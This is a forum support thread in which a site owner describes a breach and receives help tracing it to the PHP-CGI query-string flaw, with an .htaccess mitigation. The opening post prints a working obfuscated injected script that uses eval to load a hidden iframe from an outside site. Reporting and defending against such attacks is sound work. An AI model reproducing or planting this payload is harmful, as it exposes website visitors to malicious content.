Previous Thread
Next Thread
Print Thread
Hop To
hackers breached my site through UBB #249131 05/11/2012 9:19 AM
Joined: May 2008
Posts: 735
Bad Frog Offline OP
old hand
OP Offline
old hand
Joined: May 2008
Posts: 735
hackers found a way to inject a file onto my site that self replicated throughout my server and injected malicious code in all index.htm and index.html files.

they did it with this...
Code
-- SD: saved code locally and removed from post --


and this is what they were injecting...
Code
 
<script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c63c77c59c55c79c76c75c55c76c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c63c77c59c55c79c76c75c55c76c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va"+"l";}if(v)e=window[v];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;569!=i;i+=1){j=i;if(e)s=s+r["fromC"+z](w[j]*1+42);} if(v&&e&&r)e(s);</script>


I am using UBB 7.5.6p2


Last edited by SD; 05/11/2012 10:44 AM. Reason: Just removed actual exploit line

"No matter where you go, there you are."
"If you can't do something smart, Do something right"
"There are three kinds of people in the world, those who can count, and those who can't"
Re: hackers breached my site through UBB [Re: Bad Frog] #249132 05/11/2012 10:40 AM
Joined: Jun 2006
Posts: 81
Mike L Offline
member
Offline
member
Joined: Jun 2006
Posts: 81
If the above code works, it is WAY NOT COOL and irresponsible to post it in public.

Please delete it and send it to UBBSystem as a PM or e-mail or both.


Re: hackers breached my site through UBB [Re: Bad Frog] #249133 05/11/2012 10:42 AM
Joined: Apr 2007
Posts: 3,938
SD Offline
Former Developer
Offline
Former Developer
Joined: Apr 2007
Posts: 3,938
it's a php flaw and not a ubb flaw. ( from what i've gathered )

if your host is running php as a CGI, then there is a known exploit to any php that can be temporarily fixed with .htaccess change..

http://www.php.net/archive/2012.php#id2012-05-03-1

Quote:
To fix this, update to PHP 5.3.12 or PHP 5.4.2.

We recognize that since CGI is a rather outdated way to run PHP, it may not be feasible to upgrade these sites to a modern version of PHP.

An alternative is to configure your web server to not let these types of requests with query strings starting with a "-" and not containing a "=" through. Adding a rule like this should not break any sites. For Apache using mod_rewrite it would look like this:


( mod_rewrite must be enabled - usually is - add to .htaccess )

Code
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]


can you run phpinfo ( from your cpanel and verify ? )

ty smile

Re: hackers breached my site through UBB [Re: Bad Frog] #249134 05/11/2012 10:46 AM
Joined: Apr 2007
Posts: 3,938
SD Offline
Former Developer
Offline
Former Developer
Joined: Apr 2007
Posts: 3,938
note: if your PHP is running as a FAST CGI or DSO, then this can't be exploited.

so push your host to run 1 of the 2 AND have php upgraded to latest version.

this has been around in php/cgi for 8yrs...

you should really push your host to:

Quote:
Cid advised Web servers administrators who run PHP through php-cgi, to update to the new PHP 5.4.3 or PHP 5.3.13, or to modify their setup so that it uses the PHP module (mod_php) under Apache or FastCGI, which is not vulnerable.


if possible, however..

2c

Re: hackers breached my site through UBB [Re: Bad Frog] #249145 05/11/2012 11:50 AM
Joined: Dec 2003
Posts: 1,796
AllenAyres Offline
Pooh-Bah
Offline
Pooh-Bah
Joined: Dec 2003
Posts: 1,796
zoinks, or change hosts if they refuse to update 8 year old software - there's a responsibility to customers regarding this when they decide to accept money for hosting.


- Allen
- ThreadsDev | PraiseCafe
Re: hackers breached my site through UBB [Re: Bad Frog] #249146 05/11/2012 11:52 AM
Joined: Apr 2007
Posts: 3,938
SD Offline
Former Developer
Offline
Former Developer
Joined: Apr 2007
Posts: 3,938
well, it's an 8yr old bug.. the software ( php ) is recent builds, but the host has decided to run it as a CGI ( ancient )..

note: ubbcentral runs as fastcgi ( safe ) here.

so you are correct, allen that the host should get away from CGI and/or upgrade to one of those 2 versions of php

smile

Re: hackers breached my site through UBB [Re: Bad Frog] #249155 05/11/2012 3:07 PM
Joined: May 2008
Posts: 735
Bad Frog Offline OP
old hand
OP Offline
old hand
Joined: May 2008
Posts: 735
I pointed my host to this thread and they took care of things.
Thank you for the help!


"No matter where you go, there you are."
"If you can't do something smart, Do something right"
"There are three kinds of people in the world, those who can count, and those who can't"

Forum Search
ShoutChat Box
Comment Guidelines: Do post respectful and insightful comments. Don't flame, hate, spam.
Recent Topics
Mobile app?
by Baldeagle - 12/06/2019 9:32 PM
How do you change Text Line spacing?
by jorb - 11/23/2019 12:14 AM
What happened to FAQ or Forum Help
by Ruben - 11/20/2019 11:58 AM
Search feature encountering an Error message
by jorb - 11/20/2019 12:06 AM
UBB Dev
by JAISP - 11/03/2019 11:01 AM
Who's Online Now
1 registered members (isaac), 89 guests, and 389 spiders.
Key: Admin, Global Mod, Mod
Random Gallery Image
Latest Gallery Images
Artistic structures
Artistic structures
by isaac, August 29
Stones
Stones
by isaac, August 19
Amusing Terain Scenics
Amusing Terain Scenics
by isaac, August 19
Sky places
Sky places
by isaac, August 19
Powered by UBB.threads™ PHP Forum Software 7.7.4
(Snapshot build 20191023)